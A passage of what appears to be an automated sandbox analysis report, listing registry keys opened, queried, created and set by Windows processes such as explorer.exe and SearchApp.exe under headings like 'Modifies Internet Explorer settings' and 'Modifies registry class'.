| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\explorer.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3642458265-1901903390-453309326-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
